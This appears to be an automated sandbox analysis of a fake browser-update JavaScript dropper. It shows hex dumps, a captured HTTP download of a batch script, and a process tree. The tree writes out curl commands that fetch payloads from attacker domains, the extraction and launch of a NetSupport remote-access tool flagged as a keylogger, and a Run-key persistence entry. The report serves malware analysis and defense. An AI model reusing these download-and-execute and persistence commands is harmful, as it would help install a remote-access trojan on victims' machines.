                                                          2023-08-02 08:16:24 UTC3533INData Raw: 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 75 73 65 72 33 32 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 36 22 47 00 3a 22 47 00 ff ff ff ff ea 22 47 00 ee 22 47 00 ff ff ff ff 6e 24 47 00 72 24 47 00 48 3a 6d 6d 3a 73 73 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 2f 64 2f 79 79 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41
                                                          Data Ascii: opupGetActiveWindowMessageBoxAuser32.dll6"G:"G"G"Gn$Gr$GH:mm:ssdddd, MMMM dd, yyyyM/d/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepA
                                                          2023-08-02 08:16:24 UTC3549INData Raw: 00 00 3a 53 47 00 06 00 00 00 44 53 47 00 0b 00 00 00 4c 53 47 00 0b 00 00 00 54 53 47 00 06 00 00 00 5c 53 47 00 06 00 00 00 66 53 47 00 0f 00 00 00 6e 53 47 00 10 00 00 00 76 53 47 00 06 00 00 00 7e 53 47 00 06 00 00 00 88 53 47 00 13 00 00 00 90 53 47 00 14 00 00 00 98 53 47 00 14 00 00 00 a2 53 47 00 20 05 93 19 02 00 00 00 78 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b4 53 47 00 00 00 00 00 bf 53 47 00 20 05 93 19 02 00 00 00 a8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d4 53 47 00 ff ff ff ff df 53 47 00 20 05 93 19 01 00 00 00 d8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f4 53 47 00 20 05 93 19 01 00 00 00 00 0e 48 00 00 00 00 00 00
                                                          Data Ascii: :SGDSGLSGTSG\SGfSGnSGvSG~SGSGSGSGSG xHSGSG HSGSG HSG H
                                                          2023-08-02 08:16:24 UTC3565INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 9c 7a 47 00 20 05 93 19 06 00 00 00 28 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b0 7a 47 00 00 00 00 00 b8 7a 47 00 01 00 00 00 c3 7a 47 00 02 00 00 00 ce 7a 47 00 03 00 00 00 d9 7a 47 00 04 00 00 00 e4 7a 47 00 20 05 93 19 02 00 00 00 78 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 7a 47 00 00 00 00 00 03 7b 47 00 20 05 93 19 01 00 00 00 a8 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 18 7b 47 00 20 05 93 19 04 00 00 00 d0 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 7b 47 00 00 00 00 00 38 7b 47 00 01 00 00 00 43 7b 47 00 02 00 00 00 4e 7b 47 00 20
                                                          Data Ascii: zG (MHzGzGzGzGzGzG xMHzG{G MH{G MH0{G8{GC{GN{G
                                                          2023-08-02 08:16:24 UTC3581INData Raw: 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 77 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 41 00 00 88 00 44 6f 73 44 61 74 65 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 ba 00 46 69 6c 65 54 69 6d 65 54 6f 44 6f 73 44 61 74 65 54 69 6d 65 00 4e 03 53 79 73 74 65 6d 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 00 be 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 00 83 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 73 02 4f 70 65 6e 45 76 65 6e 74 41 00 00 65 03 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 5e 02 4d 61 70 56 69 65 77 4f 66 46 69
                                                          Data Ascii: mpareFileTimeFileTimeToSystemTimeGetSystemInfoGlobalMemoryStatuswGetModuleHandleADosDateTimeToFileTimeFileTimeToDosDateTimeNSystemTimeToFileTimeGetSystemTimeWaitForMultipleObjectssOpenEventAeUnmapViewOfFile^MapViewOfFi
                                                          2023-08-02 08:16:24 UTC3597INData Raw: 00 00 00 00 00 00 42 00 43 00 4a 00 32 00 00 00 00 00 00 00 00 00 e0 58 44 00 60 59 44 00 03 01 03 03 00 00 00 00 28 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 42 00 43 00 4a 00 00 00 90 5b 44 00 c0 5b 44 00 05 02 03 03 00 00 00 00 fc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 e0 5b 44 00 00 5c 44 00 01 04 03 03 00 00 00 00 f0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 20 5c 44 00 40 5c 44 00 01 05 03 03 00 00 00 00 e8 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 60 5c 44 00 80 5c 44 00 01 07 03 03 00 00 00 00 dc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 a0 5c 44 00 c0 5c 44 00 05 08 03 03 00 00 00 00 d0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 53 00 50 00 41 00 52 00 43 00 00 00 41 00 52 00 4d 00 54 00 00 00 00 00 41 00 52 00 4d 00 00 00 49
                                                          Data Ascii: BCJ2XD`YD(HBCJ[D[DH[D\DH \D@\DH`\D\DH\D\DHSPARCARMTARMI


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.649709188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-08-02 08:16:25 UTC3611OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1
                                                          Host: mangoairsoft.com
                                                          User-Agent: curl/7.55.1
                                                          Accept: */*
                                                          2023-08-02 08:16:25 UTC3611INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 02 Aug 2023 08:16:25 GMT
                                                          Content-Type: application/x-msdos-program
                                                          Content-Length: 532
                                                          Connection: close
                                                          Last-Modified: Thu, 27 Jul 2023 14:27:39 GMT
                                                          ETag: "214-60178c42f5f39"
                                                          Accept-Ranges: bytes
                                                          2023-08-02 08:16:25 UTC3611INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 0d 0a 3a 3a 20 73 73 52 73 67 73 33 73 67 73 62 67 73 67 67 73 67 73 33 67 73 67 73 33 73 33 5a 36 0d 0a 3a 3a 20 73 73 52 62 5a 67 73 36 67 73 67 73 33 32 36 66 73 73 52 62 0d 0a 0d 0a 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 78 63 6f 70 79 20 2f 68 20 2f 79 20 37 7a 7a 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 37 7a 7a 2e 65 78 65 20 78 20 2d 79 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 6c 6f 6c 6f 2e 37 7a 20 20 2d 6f 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 54 49 4d 45 4f 55 54 20 2f 54 20 37 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f
                                                          Data Ascii: @echo off:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6:: ssRbZgs6gsgs326fssRbstart /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:10:16:15
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js"
                                                          Imagebase:0x7ff6e9eb0000
                                                          File size:163'840 bytes
                                                          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:1
                                                          Start time:10:16:19
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.bat
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:2
                                                          Start time:10:16:19
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6da640000
                                                          File size:625'664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:3
                                                          Start time:10:16:20
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c C:\ProgramData\sett.bat"
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:4
                                                          Start time:10:16:20
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\curl.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
                                                          Imagebase:0x7ff7d5fd0000
                                                          File size:424'448 bytes
                                                          MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Target ID:5
                                                          Start time:10:16:21
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c C:\ProgramData\7z.bat"
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:6
                                                          Start time:10:16:21
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\curl.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                                          Imagebase:0x7ff7d5fd0000
                                                          File size:424'448 bytes
                                                          MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:7
                                                          Start time:10:16:23
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c C:\ProgramData\qweq.bat"
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:8
                                                          Start time:10:16:23
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\curl.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
                                                          Imagebase:0x7ff7d5fd0000
                                                          File size:424'448 bytes
                                                          MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:9
                                                          Start time:10:16:24
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\reg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                                          Imagebase:0x7ff703f90000
                                                          File size:72'704 bytes
                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:10
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\reg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                                          Imagebase:0x7ff703f90000
                                                          File size:72'704 bytes
                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:11
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c C:\ProgramData\qweq.bat"
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:12
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\xcopy.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:xcopy /h /y 7zz.exe C:\ProgramData\
                                                          Imagebase:0x7ff6908d0000
                                                          File size:47'616 bytes
                                                          MD5 hash:6BC7DB1465BEB7607CBCBD7F64007219
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:13
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:14
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\timeout.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:TIMEOUT /T 7
                                                          Imagebase:0x7ff76b000000
                                                          File size:30'720 bytes
                                                          MD5 hash:EB9A65078396FB5D4E3813BB9198CB18
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:15
                                                          Start time:10:16:25
                                                          Start date:02/08/2023
                                                          Path:C:\ProgramData\7zz.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                                          Imagebase:0x400000
                                                          File size:587'776 bytes
                                                          MD5 hash:42BADC1D2F03A8B1E4875740D3D49336
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs

                                                          General

                                                          Target ID:16
                                                          Start time:10:16:33
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c C:\ProgramData\client32.exe
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273'920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:17
                                                          Start time:10:16:33
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\reg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                                          Imagebase:0x7ff703f90000
                                                          File size:72'704 bytes
                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:18
                                                          Start time:10:16:33
                                                          Start date:02/08/2023
                                                          Path:C:\ProgramData\client32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\ProgramData\client32.exe
                                                          Imagebase:0xbe0000
                                                          File size:101'680 bytes
                                                          MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.994683044.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.994683044.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.994296393.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000000.509036667.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 12%, ReversingLabs

                                                          General

                                                          Target ID:19
                                                          Start time:10:16:33
                                                          Start date:02/08/2023
                                                          Path:C:\Windows\System32\reg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                                          Imagebase:0x7ff703f90000
                                                          File size:72'704 bytes
                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:20
                                                          Start time:10:16:34
                                                          Start date:02/08/2023
                                                          Path:C:\ProgramData\client32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\ProgramData\client32.exe"
                                                          Imagebase:0xbe0000
                                                          File size:101'680 bytes
                                                          MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000000.511172990.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.512939596.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security

                                                          General

                                                          Target ID:21
                                                          Start time:10:16:42
                                                          Start date:02/08/2023
                                                          Path:C:\ProgramData\client32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\ProgramData\client32.exe"
                                                          Imagebase:0xbe0000
                                                          File size:101'680 bytes
                                                          MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.529209047.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.530355277.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                          Disassembly

                                                          Code Analysis

                                                          Call Graph

                                                          • Executed
                                                          • Not Executed
                                                          callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C4 clusterC8C4 clusterC10C4 clusterC12C4 clusterC14C0 E1C0 entry:C0 F3C2 E1C0->F3C2 F15C14 Function E1C0->F15C14 F5C4 F7C6 Function F5C4->F7C6 F9C8 aa F5C4->F9C8 F11C10 open F5C4->F11C10 F13C12 send F5C4->F13C12

                                                          Script:

                                                          Code
                                                          0
                                                          ( function () {
                                                            1
                                                            } );
                                                              2
                                                              var e;
                                                                3
                                                                e =
                                                                  4
                                                                  function (e) {
                                                                  • ("https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php") ➔ " /*bmGHnpjSkYQIlQlyHvcRXvRCsYRVBhoCHeNGbqWbwwWVkqIpNFmxjdbskNuCATeNpLxCJEaUCxQlrBHoXaHnxGJKlEaDXjqHgHwriBGOZlZrerUegflpMCOUmuGXdSsCtGJRYzMtMlUfZRsOBQsoJZhexgnQxIEUsiuZhZFzFcwHJYiLKIcjASjITVArKefAiElEKXustADnFbQAUvqVgtVnJMTEPvxZSsNAXigWzQVyiJqamrrfUOoTQcfigcqqjjVLmlhhgOpvKCEwsEjwfJGTUTskoYYirHQfTMoDokojDojSFsLXLBoPSoDQjEooXpeyqrtAKmTLSyiFBpsQRZfFZuwzWdhNUWkgpeEwVtbvvGRfvFQSwryNjhxDsomVMdgrlbiGIEWBFECXAUkGViVnMouuaTvOldNuiDZTNEjasifKkflOjLmDSVjqwwKQUxsayxDJMvfHyeJUDpeEtQAPBjHzEAIwsGYtmEkREtekuBJYKqUuDeMBrNmiaRUBkEbNOLlCXyKJHYHhcoDnbIjiTyZQxMzQnbgkJhMeAEVQbSLYihMTCHVANXRhIgoojEnuImPdAvVGDycFigceUADVxWyQfbsDaUUsDFoYMnIPDhFnAsBQkpnpQwcHmNsAKjMOpnVqaZcaJpJBrIPYWDRMpJtmPzBDDZmzYMJIPYhfcwFyifNnjoAveiYYoOKqhFIlFzByEIrJHjlDTRgHQywRfyfbtXjrucodiagTFdVtgJtRsxBxPRjEQAktQgJahpBcFyhQZYyBCQYnqRdWFomwoNLneYeGDIfrMRQbCfLBVpdHbQSgfuYItIHMAzkbeoqQfxGNVyyluCakuqACtErIFsSgvUtLRTFIadNxZqmFKQcRxDinyjrTtkltzmZyTgvAXeIseynXbNQfpUxFnhlTJmwPGfoQNsYKOlibQjjeEDxZmaSrUdJFEvExxHbGGlRluYyqEUmDqBDBIwxDvxAtvXdBIIpkyWmcSGbfWBpQstmcKMaeUVvBqDjdsxYwdhjanOsKSQARUrHElgFGPiwUzaApRvabxNqgMNEKjvVHrUHkFufoLQFZBpgmOXnyrHXXxAGNGAKWhkAxAOskMLmzZhgvvRKoljykHZOINNqjBHVmIgjPEdooNJgUSoKwUHhAgsRsgtFUMIzhoqmEiOHvMpgORvbWyLaUWlhjASireAYBHLWANGFzyvADSorljDLQqhaNfFeMImuYhkPGBtUlSlPgpnUeaqABGSYIBjRWORotpFDNwWdRBBEUeXpOUbsgGdPRWcdHjkSqtTkyEFeEwtCTxMnbtSUzBjikDKrCEnyfYwkyqukFrAqfrSPctIIbNMzLKEDMkbtpCJBTsenQIVWCnnRtkCjgUHqEuErttGVSpjHvFpVDOJdeyIuBEDQOruWwoGhDsCxRomKrqbKlzZXWZtacqwVNmIzzvoFvjAClKznDOuJsaDnXgQgOSbjDEPTAModTQqZNLczWzcUtPvltImPFvdEOEcImjPtuAzgOBiHTRGgBpyYdroNyWBXeRdEmuECEVCYqwIYBlVIBYzioINvBNevWcBliuRdjVMHyaZlLaHdBoFNjhgZqzqaRXStbCGQbFRacYqqZNZtiFpnRDVZcbumGuBToDTNEwMKTyxZkCANnbjXXqUcFSNHZOOgqZPILDbRqzcvkryrQsjgHYmsapqKlbBkBcBynyposURJceftpiDBTEsikINBcZRtdAWhfXsruNgoaRcBBpiMOADebUemXBTVuIUqqMFAhTZQvwvURJDbYPqHFJcYrPIiwwRjjEugFaBzkWggCgerVEmiXGUHpBEuBrQmyiEpcMOvzrJZYLtMdjKDkiDMwQqDeALFSJiAiMqeOBprOIsJXlsmBnGvaFsFWmBqThFXjdwKOmJdaeZEEJQwDndqOhggGxzyIIEhVZeuiIFaeJpYZcSqlrNgrvyFvtDHOAaCEaKwLWswBHwuGrYlHlbgdWrPaSONXtCBEQWTRTqVEjKzHgpVrvgkdtHtijZxpPYcStcIzBfUWrVpPCZVVlwtvqtviQpjLHvkfWGdUNzYPbOVWaduaCTLzwwafsvqUMNzbjbWuRaHEDfN